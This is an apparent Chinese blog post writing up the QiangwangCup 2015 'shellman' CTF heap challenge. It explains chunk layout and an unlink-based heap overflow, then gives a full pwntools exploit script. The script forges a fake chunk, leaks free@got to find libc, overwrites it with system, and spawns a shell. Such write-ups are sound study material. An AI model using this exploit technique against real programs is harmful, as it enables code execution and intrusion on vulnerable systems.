

pollux's Dairy

QiangwangCup-2015-shellman

pollux's Dairy

QiangwangCup-2015-shellman

unlink CTF

字数统计: 1k阅读时长: 6 min

 2018/10/11   Share

• 
• 
• 
• 
• 

刚开始接触堆，将解决的不懂的记录一下，后续会继续更正之前错误的认识。

指向堆的指针的问题

程序存在一个结构体，存在三个变量

.bss:00000000006016C0 ; __int64 qword_6016C0[]
.bss:00000000006016C0 qword_6016C0    dq ?                    ; DATA XREF: main+38↑o
.bss:00000000006016C0                                         ; .text:0000000000400A90↑o ...
.bss:00000000006016C8 ; __int64 qword_6016C8[]
.bss:00000000006016C8 qword_6016C8    dq ?                    ; DATA XREF: sub_400B40+B5↑w
.bss:00000000006016C8                                         ; sub_400CE0+79↑w
.bss:00000000006016D0 ; __int64 qword_6016D0[]
.bss:00000000006016D0 qword_6016D0    dq ?                    ; DATA XREF: sub_400B40+BC↑w
.bss:00000000006016D0                                         ; sub_400C30+73↑r ...

申请了3个大小均为0xa0的chunk后，堆布局如下：

gef➤  heap chunks
Chunk(addr=0x1592010, size=0xb0, flags=PREV_INUSE)
    [0x0000000001592010     61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61     aaaaaaaaaaaaaaaa]
Chunk(addr=0x15920c0, size=0xb0, flags=PREV_INUSE)
    [0x00000000015920c0     62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62     bbbbbbbbbbbbbbbb]
Chunk(addr=0x1592170, size=0xb0, flags=PREV_INUSE)
    [0x0000000001592170     2f 62 69 6e 2f 73 68 3b 63 63 63 63 63 63 63 63     /bin/sh;cccccccc]
Chunk(addr=0x1592220, size=0x20df0, flags=PREV_INUSE)  ←  top chunk

查看这个结构体，可以看到结构体的第一个变量表示是否正在使用，第二个变量表示申请的堆大小，第三个变量是一个指向堆的指针，0x6016d0是一个指针，这个指针指向堆上的一个地址0x1592010，这个地址也是malloc返回的地址。

gef➤  x/9gx 0x6016c0
0x6016c0:	0x0000000000000001	0x00000000000000a0
0x6016d0:	0x0000000001592010	0x0000000000000001
0x6016e0:	0x00000000000000a0	0x00000000015920c0
0x6016f0:	0x0000000000000001	0x00000000000000a0
0x601700:	0x0000000001592170

堆大小的问题

程序malloc(0xa0)申请了0xa0大小的chunk，查看堆布局发现在size字段中，大小为0xb0。
所以申请了0xa0的chunk，该chunk真正的大小为0xa0+8+8=0xb0

gef➤  heap chunks
Chunk(addr=0x1592010, size=0xb0, flags=PREV_INUSE)
    [0x0000000001592010     61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61     aaaaaaaaaaaaaaaa]

如下所示，多了16字节的数据，分别是0x00和0x10。有一个疑问，在被释放的chunk中0x1592000中的数据应该是prev_size，在正被使用的chunk中，这部分数据全是0。而0x1592008中的数据就是当前chunk的大小和前一个chunk是否被使用的标志位。

gef➤  x/10gx 0x1592000
0x1592000:	0x0000000000000000	0x00000000000000b1
0x1592010:	0x6161616161616161	0x6161616161616161
0x1592020:	0x6161616161616161	0x6161616161616161
0x1592030:	0x6161616161616161	0x6161616161616161
0x1592040:	0x6161616161616161	0x6161616161616161

system（chunk2中的内容）为什么会执行shell

调试发现，程序在执行call 0x400620 <free@plt>时会将chunk中的内容存放到rdi寄存器中

free@plt (
   $rdi = 0x00000000012410c0 → "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb[...]",
   $rsi = 0x0000000000000001,
   $rdx = 0x0000000000000000
)

所以/bin/sh;被存放到rdi寄存器，执行system函数时，就调用了shell。

程序

程序edit部分未能和原长度进行判断，导致出现堆溢出漏洞。第一次edit，free是为了获取一个原指向堆的可控指针0x6016d0 -> 0x6016b8。第二次edit，将该指针0x6016d0指向free@got，然后通过list获取free@got的地址，计算libc的基址，通过偏移计算出system的地址。第三次edit将system的地址写入free@got指向的地址，free函数就被替换成system函数了，释放chunk2后，即获取shell。

EXP

#!/usr/bin/env python
from pwn import *

p = process('./shellman')

DEBUG = 0
VERBOSE = 1
if DEBUG:
	gdb.attach(p)
if VERBOSE:
	context(log_level = 'debug')

def list_code():
	p.recvuntil('>')
	p.sendline('1')
	p.recvuntil('SHELLC0DE 0: ')
	return p.read(16).decode('hex')[::-1].encode('hex')

def new_code(code):
	p.recvuntil('>')
	p.sendline('2')
	p.recvuntil(':')
	p.sendline(str(len(code)))
	p.recvuntil(':')
	p.sendline(code)

def edit_code(num,code):
	p.recvuntil('>')
	p.sendline('3')
	p.recvuntil(':')
	p.sendline(str(num))
	p.recvuntil(':')
	p.sendline(str(len(code)))
	p.recvuntil(':')
	p.sendline(code)

def delete_code(num):
	p.recvuntil('>')
	p.sendline('4')
	p.recvuntil(':')
	p.sendline(str(num))
chunk0_size = 0xa0
chunk1_size = 0xa0
ptr_addr = 0x6016d0
free_got = 0x601600

def exp():
	new_code('a'*0xa0)
	new_code('b'*0xa0)
	new_code('/bin/sh;'+'c'*0x98)
	prev_size_0 = p64(0)
	size_0 = p64(chunk0_size | 0x1)
	fd_0 = p64(ptr_addr - 0x18)
	bk_0 = p64(ptr_addr - 0x10)
	user_data = 'd' * (chunk0_size - 0x20)
	prev_size_1 = p64(chunk0_size)
	size_1 = p64(chunk1_size + 0x10)
	payload1  = prev_size_0 + size_0 + fd_0 + bk_0 +user_data + prev_size_1 + size_1
	gdb.attach(p)
	edit_code(0,payload1)
	delete_code(1)          # 0x6016d0 -> 0x6016b8

	payload2 = p64(0x0) + p64(0x1) + p64(0xa) + p64(free_got)
	edit_code(0,payload2)   # 0x6016d0 -> 0x601600(free_got)
	free_addr = list_code()
	print 'free_addr: ' + free_addr
	libc_base = int(free_addr,16) - 0x844f0
	print 'libc_base: ' + str(hex(libc_base))
	system_addr = libc_base + 0x45390
	print 'system_addr ' + str(hex(system_addr))
	edit_code(0,p64(system_addr))
	delete_code(2)
	p.interactive()

exp()

REF

http://www.ms509.com/2016/01/22/glibc-heap-ctf-writeup
http://www.cnblogs.com/shangye/p/6261606.html

原文作者：Po1lux

原文链接：http://yoursite.com/2018/10/11/QiangwangCup-2015-shellman/

发表日期：October 11th 2018, 7:52:38 pm

更新日期：April 5th 2019, 11:31:09 am

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  2014 HITCON stkof
• Previous Post
  X-CTF Quals 2016 - b0verfl0w

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 刚开始接触堆，将解决的不懂的记录一下，后续会继续更正之前错误的认识。

指向堆的指针的问题

堆大小的问题

system（chunk2中的内容）为什么会执行shell

程序

EXP

REF



• Archive
• Tag
• Cate

Total : 56

2020

• 04/11de5811cdab48a0f5e656384bd3feff88
• 03/30C++虚表杂记
• 03/2651ff4f42e4a8218a6d27ec8cd9874f37
• 03/25android-6.0.0源码分析-zygote启动过程
• 02/23mineucore-内核线程管理学习笔记
• 02/21mineucore-x86-32下的中断处理
• 02/20mineucore-x86-32系统启动流程
• 02/19inlineHookS安卓内联hook框架
• 01/31内存壳学习
• 01/04汇编分析一个so文件中的变形RC4和变形base64算法

2019

• 12/17ubuntu-16.04 源码编译 Android-6.0.0_r1 与调试
• 12/17ubuntu16.04 处理wifi问题小记
• 12/15FUPK源码阅读
• 12/14Android-6.0.0_r1源码分析-Java层加载Dex和类的过程
• 12/09NDK开发学习记录
• 12/02初试反调试
• 12/01手机和AS中debug环境配置问题小记
• 11/27nexus5环境配置
• 11/23通过在native层动态修改内存中的Dalvik指令来学习Dex文件格式
• 11/20IDA notebook
• 11/08使用frida Hook动态加载Dex
• 11/06frida-notebook
• 11/04Linux Kernel ROP
• 10/06mineucore-虚拟内存管理学习笔记
• 10/03mineucore-物理内存管理学习笔记
• 09/22seccomp沙箱机制 & 2019ByteCTF VIP
• 06/252019-SCTF-easy_heap[fastbin attack]
• 06/252019-SCTF-one_heap[tcache的counts中存在的数据类型判断漏洞]
• 06/102019-TCTF(final)-babyheap2.29
• 05/272018-0CTF-heapstorm2
• 05/052019-sixstarsCTF-babyshell[shellcode]
• 05/042019-sixstarsCTF-heap_master
• 05/032018-hitcon-baby_tcache
• 05/032018-Hitcon-children_tcache
• 05/022019-sixstarsCTF-girlfriend[libc2.29,tcache]
• 05/012019-sixstarsCTF-quicksort
• 04/172018-网顶杯CTF-blind
• 04/132019-西湖论剑CTF-Strom_note-[off by one, largebin attack]
• 04/102019-西湖论剑CTF-noinfoleak
• 04/092019-西湖论剑CTF-story
• 04/042018-SUCTF-lock2-[fmt,栈溢出,Canary]
• 04/012018-SUCTF-note
• 03/29House_of_Orange在2.24glibc下的利用
• 03/272016-Hitcon-House_of_Orange
• 03/242018-SUCTF-Heap-[off by one,unlink]
• 03/202016-BCTF-bcloud-[Heap of Force]
• 03/10libc源码分析-chunk的释放
• 03/082014-hack.lu CTF-OREO-[House of spirit]
• 03/022016-HCTF-fheap-[fastbin UAF,PIE,DynELF use fmt]

2018

• 10/202016 ZCTF note2
• 10/172014 HITCON stkof
• 10/11QiangwangCup-2015-shellman
• 09/30X-CTF Quals 2016 - b0verfl0w
• 09/16格式化字符串漏洞总结
• 09/15FengyunCup-2016-safedoor
• 09/13pwnable.kr-brain fuck

unlink fastbin attack House of spirit House of Force UAF DynELF PIE format string off by one x64 64bit 格式化字符串漏洞 栈溢出 Canary tcache libc-2.29 chunk overlapping chunk extend shellcode，系统调用 libc2.29 stack overflow fmt rop 2016，CTFs，fsb CTF stack pivoting OS pwnable fsb



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

heap stack android-reverse learning-note android-system Operating-System pwnable conclusion

